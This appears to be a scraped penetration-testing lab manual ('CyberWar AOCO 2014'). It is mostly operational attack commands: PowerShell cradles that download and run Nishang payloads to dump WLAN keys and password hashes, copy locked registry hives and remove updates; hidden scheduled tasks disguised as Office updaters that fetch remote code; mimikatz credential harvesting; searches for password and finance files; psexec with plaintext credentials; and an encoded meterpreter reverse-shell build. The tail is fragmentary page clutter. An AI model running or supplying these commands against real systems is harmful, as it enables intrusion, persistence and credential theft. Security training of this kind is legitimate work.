Browse_Accept_Applet.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Browse_Accept_Applet.ps1
http://10.10.5.235:8080/strategicsec
Lab 13i: Nishang Payload which dumps keys for WLAN profiles.

powershell.exe (new-object System.Net.WebClient).DownloadFile('http://StrategicSec-Ubuntu-VM-Tap0IP/nishang/Get-WLAN-Keys.ps1','%TEMP%\Get-WLAN-Keys.ps1')

powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Get-WLAN-Keys.ps1
119

This script is a part of Nishang. It copies a file from an NTFS partitioned volume by reading the raw
volume and parsing the NTFS structures. This bypasses file DACL's, read handle locks, and SACL's. You
must be an administrator (elevated privileges) to run the script. This can be used to read SYSTEM files
which are normally locked, such as the NTDS.dit file or registry hives.
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/InvokeNinjaCopy.ps1','%TEMP%\Invoke-NinjaCopy.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Invoke-NinjaCopy.ps1 -path
c:\windows\system32\config\system -localdestination %TEMP%\system
Nishang payload which dumps password hashes

powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/GetPassHashes.ps1','%TEMP%\Get-PassHashes.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Get-PassHashes.ps1
Nishang Payload which silently removes updates for a target machine.

powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/RemoveUpdate.ps1','%TEMP%\Remove-Update.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Remove-Update.ps1 KB222222
Nishang payload which performs a Brute-Force Attack against SQL Server, Active Directory, Web and
FTP
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/BruteForce.ps1','%TEMP%\Brute-Force.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Brute-Force.ps1 -Identity ftp://10.10.5.235
-Service FTP
Nishang payload which performs a Brute-Force Attack against SQL Server, Active Directory, Web and
FTP.
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/InvokeMedusa.ps1','%TEMP%\Invoke-Medusa.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Invoke-Medusa.ps1 -Identity
ftp://10.10.5.235 -UserName anonymous -Password 1 -Service FTP
121

Lab 14: SchTasks for Powershell

#(X86) - On User Login
schtasks /create /tn OfficeUpdaterA /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object
net.webclient).downloadstring (''http://StrategicSec-Ubuntu-Tap0-IP:8080/kBBldxiub6'''))'" /sc onlogon /ru
System
#(X86) - On System Start

schtasks /create /tn OfficeUpdaterB /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object
net.webclient).downloadstring (''http://StrategicSec-Ubuntu-Tap0-IP:8080/kBBldxiub6'''))'" /sc onstart /ru
System
123

#(X86) - On User Idle (30mins)
schtasks /create /tn OfficeUpdaterC /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object
net.webclient).downloadstring (''http://StrategicSec-Ubuntu-Tap0-IP:8080/kBBldxiub6'''))'" /sc onidle /i 30
#(X64) - On User Login

schtasks /create /tn OfficeUpdaterA /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object
net.webclient).downloadstring (''http://StrategicSec-Ubuntu-Tap0-IP:8080/kBBldxiub6'''))'" /sc onlogon /ru
System
#(X64) - On System Start

schtasks /create /tn OfficeUpdaterB /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object
net.webclient).downloadstring (''http://StrategicSec-Ubuntu-Tap0-IP:8080/kBBldxiub6'''))'" /sc onstart /ru
System
#(X64) - On User Idle (30mins)

schtasks /create /tn OfficeUpdaterC /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object
net.webclient).downloadstring (''http://StrategicSec-Ubuntu-Tap0-IP:8080/kBBldxiub6'''))'" /sc onidle /i 30
125

Use exploit/windows/misc/psh_web_delivery
(fill required information)
open second console

cd /var/www
sudo wget http://10.10.5.235:8080/strategicsec32
sudo cp strategicsec32 strategicsec64
You now have an attack url but only works on 32bit

powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object
net.webclient).downloadstring('http://<ip>/payload1'))"
use base64 and Encode it to avoid IEX evaluating inline
%WINDIR%\syswow64\WindowsPowerShell\v1.0\powershell.exe -w hidden -nop -ep bypass -c "IEX
((new-object net.webclient).downloadstring('http://<ip>/payload2'))"
(example)
Place if statement in payload1 (strategicsec32)
Set-StrictMode -Version 2
if ($env:Processor_Architecture -ne "x86") {
cmd /c
([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(("JVdJTkRJUiVcc3lzd29
3NjRcV2luZG93c1Bvd2VyU2hlbGxcdjEuMFxwb3dlcnNoZWxsLmV4ZSAtdyBoaWRkZW4gLW5vcCAtZXA
gYnlwYXNzIC1jICJJRVggKChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKCdod
HRwOi8vMTAuMTAuNS4yMzUvc3RyYXRlZ2ljc2VjNjQnKSki"))))
exit
}
sudo nano strategicsec32
127

Your string now works on 32bit and 64bit

Lab 15: Host Enumeration

meterpreter> execute -c -H -f cmd -a "/k" -i
129
<--- Switch to command shell set

gpresult /z
List OS Version:
ver
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v ProductName
View the list of started services (ex: search for AV):

net start
sc query
131

View the list of started processes and their respective owner:
tasklist /v
Kill a process by name:

taskkill /F /IM "cmd.exe"
List the software installed on the system:

reg query HKLM\Software

reg query HKCU\Software
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion"

133

List Mounted Devices:

fsutil fsinfo drives
reg query HKLM\system\mounteddevices

List Most Recently Run Commands:

c:\reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
Check for Autorun:
reg.exe query HKLM\Software\Microsoft\Windows\CurrentVersion\Run /S
135

reg.exe query HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall /S
reg.exe query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ /S
reg.exe query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ /S
Check AutoStart Tasks

At
type "%SystemRoot%\system.ini"
137

dir "%SystemRoot%\Tasks"

Lab 16: Credential Harvesting & Data-Mining

meterpreter > getsystem
meterpreter > load mimikatz
meterpreter > kerberos
139

meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"
meterpreter > msv
meterpreter > livessp
<-- Your AD password
<-- Your Windows7/8 password

meterpreter > ssp
141
<-- Your outlook password

meterpreter > tspkg
meterpreter > wdigest
meterpreter > mimikatz_command -f crypto::listStores

meterpreter > mimikatz_command -f crypto::listCertificates
meterpreter > mimikatz_command -f crypto::exportCertificates
meterpreter > mimikatz_command -f crypto::patchcapi

meterpreter> search -d <directory> -f <file-pattern>
Data Mining The Host

Search the drive and sort the files by time accessed

c:\dir C:\ /S /OD /TA
143
<--- Switch to command shell

Search the drive and sort the files by time created

c:\dir C:\ /S /OD /TC

Search the drive and sort the files by time written
c:\dir C:\ /S /OD /TW
Search the drive for files with business critical names or important file types
c:\dir c:\*bank* /s
145

c:\dir c:\*password* /s
c:\dir c:\*pass* /s

c:\dir c:\*competitor* /s
c:\dir c:\*competition* /s
147

c:\dir c:\*finance* /s
c:\dir c:\*invoice* /s
c:\dir c:\*risk* /s
c:\dir c:\*assessment* /s
c:\dir c:\*key* /s
c:\dir c:\*.vsd /s
c:\dir c:\*.pcf /s
c:\dir c:\*.ica /s
c:\dir c:\*.crt /s
c:\dir c:\*.key /s
c:\dir c:\*.log /s
Search the drive for files with critical data in them
c:\type c:\sysprep.inf
c:\type c:\sysprep\sysprep.xml
c:\findstr /I /N /S /P /C:password *
c:\findstr /I /N /S /P /C:secret *
c:\findstr /I /N /S /P /C:confidential *
c:\findstr /I /N /S /P /C:account *
c:\findstr /I /N /S /P /C:payroll *
c:\findstr /I /N /S /P /C:credit *

c:\findstr /I /N /S /P /C:record *
Active Directory Enumeration
c:\net view
149
<--- Switch to command shell

c:\net view /domain
c:\net user
c:\net user /domain

c:\net localgroup
c:\net localgroup /domain
151

c:\net localgroup administrators
c:\net localgroup administrators /domain
c:\net group "Domain Users" /domain

c:\net group "Domain Admins" /domain
153

net user "jima" /domain
echo %logonserver:*\\=%
c:\dsquery user -name *

c:\dsquery user -name * -limit 1000

Increasing dsquery limit
155

c:\dsquery group
Listing all of the groups on a machine
c:\dsquery group "<distinguished name>"

Listing all of the groups on a machine
Useful Resource Kit Tools

-------------------------

Find out which OU a user account resides

c:\dsquery user -samid user_name
List all domain users

c:\dsquery * -filter "(&(objectcategory=person)(objectclass=user)(name=*))" -limit 0 -attr samaccountname
157

All info about user "yoy"
c:\dsquery * -filter "(&(objectcategory=person)(objectclass=user)(samaccountname=yoy))" -limit 0 -attr *
Query Groups
c:\dsquery * -filter "(&(objectcategory=group)(objectclass=group)(name=*))" -limit 0 -attr Name
Query a specific group - in this case "Users"

c:\dsquery * -filter "(&(objectcategory=group)(objectclass=group)(name=Users))" -limit 0 -attr *
159

Lab 17: Life without metasploit

echo @echo off > pingsweep.bat
echo for %%a in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64
65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97
98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122
123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146
147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170
171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194
195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218
219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242
243 244 245 246 247 248 249 250 251 252 253 254) do ping -n 2 -w 2000 %1.%%a >> pingsweep.bat
pingsweep.bat
more
pingsweep 10.10.30

for /L %i in (1,1,255) do @echo 10.10.30.%i >> ips.txt

more ips.txt
echo heat >> names.txt

161

echo jima >> names.txt
echo roge >> names.txt
echo patr >> names.txt
echo jami >> names.txt
echo bonn >> names.txt
echo rhon >> names.txt
echo sall >> names.txt
echo joyj >> names.txt
echo laur >> names.txt
echo sloa >> names.txt
echo Administrator >> names.txt
more names.txt
for /f "tokens=1" %a in ('net view ^| find "\\"') do @echo %a >> hosts.txt

PSExec to a machine that you want connect to

PSExec in Windows
c:\psexec.exe /accepteula \\10.10.30.81 -u administrator -p P@ssw0rd4321! cmd.exe
PSExec in Linux
cd ~/toolz
wget https://s3.amazonaws.com/StrategicSec-Files/winexe
chmod 777 winexe
./winexe -U Administrator%P@ssw0rd4321! //WIN7-X64-1 cmd.exe
163

How many users are logged on/connected to a server?

NET SESSION | FIND /C "\\"

Map a drive to what you want to become your staging server
net use O: \\10.10.30.89\c$ /u:administrator P@ssw0rd4321!
net use /d O:
Which updates were installed on this compter?

Windows 7/8 (note: DISM will return far more details than WMIC.):
c:\DISM /Online /Get-Packages
165

or:
c:\WMIC QFE List

Lab 18: Setting up your second entry

sudo add-apt-repository ppa:tobydox/mingw
sudo apt-get update
167

sudo apt-get install mingw64-x-gcc mingw32-x-gcc

cd /home/strategicsec/toolz/metasploit
touch ./met_template.c
169

./msfpayload windows/meterpreter/reverse_https LHOST=10.10.5.234 LPORT=443 EXITFUNC=thread R

| ./msfencode -c 5 -e x86/shikata_ga_nai > payload
cat payload

sed -in-place -e 's/\ +//' ./payload

cat payload
171

cat /dev/urandom | tr -dc A-Za-z0-9 | head -c512 > random

cat random
vi win-met-rev-https.c
/opt/mingw32/bin/i686-w64-mingw32-gcc ./win-met-rev-https.c -o ./win-met-rev-https.exe

chmod 777 ./win-met-rev-https.exe
cp /home/strategicsec/toolz/metasploit/win-met-rev-https.exe /var/www/
exit

CyberWar AOCO 2014

Uploaded by

Copyright:

Available Formats

CyberWar AOCO 2014

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

CyberWar AOCO 2014

Uploaded by

Copyright:

Available Formats

Strategic Security, Inc.

Strategic Security, Inc.

This Page Intentionally Left Blank

Strategic Security, Inc.

Lab 5: 3rd Party Scanning and scanning via proxies .............................................................................................. 25

Strategic Security, Inc.

Strategic Security, Inc.

Strategic Security, Inc.

This Page Intentionally Left Blank

Strategic Security, Inc.

Section 1: Attacking From The Outside

Strategic Security, Inc.

Lab 1b: Fierce

Strategic Security, Inc.

Lab 1c: GXFR

Strategic Security, Inc.

Lab 1d: IP Crawl

Strategic Security, Inc.

sudo nmap -sL 148.87.1.0-255

Strategic Security, Inc.

Strategic Security, Inc.

Strategic Security, Inc.

Lab 2: Identifying Security Mechanisms

Strategic Security, Inc.

Lab 2b: Halberd

Strategic Security, Inc.

Strategic Security, Inc.

Strategic Security, Inc.

Lab 2c: OSSTMM

Strategic Security, Inc.

Lab 2d: SSLTEST

service xinetd status

Strategic Security, Inc.

osstmm-afd -P HTTP -t 127.0.0.1 -p 8888 -v

Strategic Security, Inc.

Lab 3: Dealing With Web Application Firewalls

Strategic Security, Inc.

Lab 3b: WAF Bypass SQL Injection Payloads

' and 8<9

Strategic Security, Inc.

Lab 3c: WAF Bypass Cross Site Scripting Payloads

Strategic Security, Inc.

Lab 4: Quick Hits (Googling for vulnerabilities)

Lab 4a: Google for generic Database errors

Lab 4b: Google for generic RFIs

Strategic Security, Inc.

Lab 4c: Check for XSS at xxsed.com:

Strategic Security, Inc.

Lab 5: 3rd Party Scanning and scanning via proxies

Lab 5b: Proxyfinder.pl

Strategic Security, Inc.

Lab 5c: Tor/Tor-resolve

Open up another tab to resolve the hostname

Strategic Security, Inc.

Lab 5d: Proxychains/Proxyresolv

Proxyresolv is used to resolve host names via a proxy or TOR.

Strategic Security, Inc.

We can even run Nikto through proxychains

change this line